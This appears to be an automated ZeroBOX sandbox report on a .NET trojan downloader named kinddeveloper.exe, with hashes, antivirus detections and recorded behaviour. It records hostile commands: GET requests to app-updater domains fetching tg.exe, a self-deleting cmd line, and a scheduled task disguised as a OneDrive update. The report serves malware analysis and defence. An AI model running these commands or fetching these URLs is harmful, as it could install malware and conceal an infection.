Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 3, 2025, 2:42 p.m.	March 3, 2025, 2:44 p.m.

Size	17.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`605751a3d55daaaf4ab857776a7bca58`
SHA256	`f74ea81bcd59a58e2784f74cd28c63744de51639ccc974507eff5619764b0f4d`
CRC32	`03774D7B`
ssdeep	`384:KF2QQrtyYiAxPlH6b7J46bR/+PIYg/S/0JwTCLSwoKsF:yEJSAvab7J4cGPWY0Jk1woKU`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) IsPE32 - (no description) Javascript_ActiveXObject - Use ActiveXObject JavaScript

kinddeveloper.exe "C:\Users\test22\AppData\Local\Temp\kinddeveloper.exe"
2556
- schtasks.exe "schtasks.exe" /Run /TN "OneDrive Per-Machine Standalone Update Task2"
  2640
- cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\test22\AppData\Local\Temp\kinddeveloper.exe"
  2708
  - timeout.exe timeout 1
    2824

Name	Response	Post-Analysis Lookup
app-updater1.app	A 172.67.217.156 A 104.21.83.80	104.21.83.80
app-updater.app	A 104.21.0.101 A 172.67.150.221	104.21.0.101

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.150.221	Active	Moloch
172.67.217.156	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW March 3, 2025, 2:42 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW March 3, 2025, 2:42 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 3, 2025, 2:42 p.m.			0	0
IsDebuggerPresent March 3, 2025, 2:42 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW March 3, 2025, 2:42 p.m.	buffer: Waiting for 1 console_handle: 0x00000007	1	1	0
WriteConsoleW March 3, 2025, 2:42 p.m.	buffer: seconds, press a key to continue ... console_handle: 0x00000007	1	1	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 3, 2025, 2:42 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET https://app-updater.app/api/getFile?fn=tg.exe
suspicious_features	GET method with no useragent header				suspicious_request	GET https://app-updater1.app/api/getFile?fn=tg.exe

Performs some HTTP requests (2 events)

request	GET https://app-updater.app/api/getFile?fn=tg.exe
request	GET https://app-updater1.app/api/getFile?fn=tg.exe

Allocates read-write-execute memory (usually to unpack itself) (17 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00980000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00567000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00556000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a suspicious process (2 events)

cmdline	"cmd.exe" /C timeout 1 && del "C:\Users\test22\AppData\Local\Temp\kinddeveloper.exe"
cmdline	"schtasks.exe" /Run /TN "OneDrive Per-Machine Standalone Update Task2"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\kinddeveloper.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW March 3, 2025, 2:42 p.m.	thread_identifier: 2644 thread_handle: 0x00000258 process_identifier: 2640 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks.exe" /Run /TN "OneDrive Per-Machine Standalone Update Task2" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000026c	1	1	0
CreateProcessInternalW March 3, 2025, 2:42 p.m.	thread_identifier: 2712 thread_handle: 0x0000026c process_identifier: 2708 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /C timeout 1 && del "C:\Users\test22\AppData\Local\Temp\kinddeveloper.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000258	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 3, 2025, 2:42 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Terminates another process (1 event)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess March 3, 2025, 2:42 p.m.	status_code: 0xffffffff process_identifier: 2556 process_handle: 0x0000026c		0	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"cmd.exe" /C timeout 1 && del "C:\Users\test22\AppData\Local\Temp\kinddeveloper.exe"
cmdline	"schtasks.exe" /Run /TN "OneDrive Per-Machine Standalone Update Task2"

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\kinddeveloper.exe

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Bkav	W32.AIDetectMalware.CS
Lionic	Trojan.Win32.Boxter.4!c
tehtris	Generic.Malware
CAT-QuickHeal	Trojan.Ghanarava.17409111817bca58
Skyhigh	Artemis!Trojan
McAfee	Artemis!605751A3D55D
Cylance	Unsafe
VIPRE	Heur.BZC.PZQ.Boxter.1103.919B2A47
CrowdStrike	win/malicious_confidence_70% (D)
BitDefender	Gen:Variant.Zusy.583561
K7GW	Trojan-Downloader ( 005c1b5f1 )
K7AntiVirus	Trojan-Downloader ( 005c1b5f1 )
Arcabit	Heur.BZC.PZQ.Boxter.1103.919B2A47
Symantec	Downloader
ESET-NOD32	a variant of MSIL/TrojanDownloader.Agent.RTA
APEX	Malicious
Avast	Win32:DropperX-gen [Drp]
Kaspersky	HEUR:Trojan.MSIL.SelfDel.gen
Alibaba	Trojan:MSIL/Generic.08916337
NANO-Antivirus	Trojan.Win32.SelfDel.kvwoha
MicroWorld-eScan	Gen:Variant.Zusy.583561
Rising	Downloader.Agent!8.B23 (CLOUD)
Emsisoft	Gen:Variant.Zusy.583561 (B)
F-Secure	Trojan.TR/Dldr.Agent.xbsqk
DrWeb	Trojan.Siggen30.62180
TrendMicro	TrojanSpy.Win32.STRELASTEALER.YXFB2Z
McAfeeD	ti!F74EA81BCD59
CTX	exe.trojan.msil
Sophos	Mal/Generic-S
SentinelOne	Static AI - Suspicious PE
FireEye	Gen:Variant.Zusy.583561
Google	Detected
Avira	TR/Dldr.Agent.xbsqk
Antiy-AVL	Trojan/Win32.Agent
Kingsoft	MSIL.Trojan.SelfDel.gen
Gridinsoft	Ransom.Win32.Wacatac.oa!s1
Microsoft	Trojan:Win32/Wacatac.B!ml
GData	Gen:Variant.Zusy.583561
Varist	W32/ABRisk.BIFN-6715
AhnLab-V3	Trojan/Win.Generic.C5735543
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.Downloader
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TrojanSpy.Win32.STRELASTEALER.YXFB2Z
Tencent	Msil.Trojan-Downloader.Ader.Pcnw
Yandex	Trojan.SelfDel!n2hgno0d1B8
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Agent.RTA!tr.dldr
AVG	Win32:DropperX-gen [Drp]
Paloalto	generic.ml

kinddeveloper.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All